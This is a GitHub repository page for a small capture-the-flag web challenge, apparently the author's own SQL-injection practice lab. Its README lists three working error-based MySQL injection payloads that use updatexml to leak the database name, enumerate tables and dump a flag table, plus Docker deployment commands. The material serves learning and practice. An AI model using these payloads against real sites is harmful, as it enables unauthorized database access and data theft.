Skip to content

prcuzz/baby_waf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
file
file
 
 
README.md
README.md
 
 
dockerfile
dockerfile
 
 

Repository files navigation

baby_waf

学习web时自己出(chaoxi)的一道题。

知识点是报错注入。

payload

?id=-1'||updatexml(1,concat(0x7e,database(),0x7e),1)||'1'='1

?id=-1'||updatexml (1,concat(0x7e,(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name='ctftraining')),0x7e),1)||'1'='1

?id=-1'||updatexml (1,concat(0x7e,(select(group_concat(`1`))from(select(1)union(select*from(flag)))a),0x7e),1)||'1'='1

部署

sudo docker build -f dockerfile -t prcuzz_waf .
sudo docker run -P prcuzz_waf

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages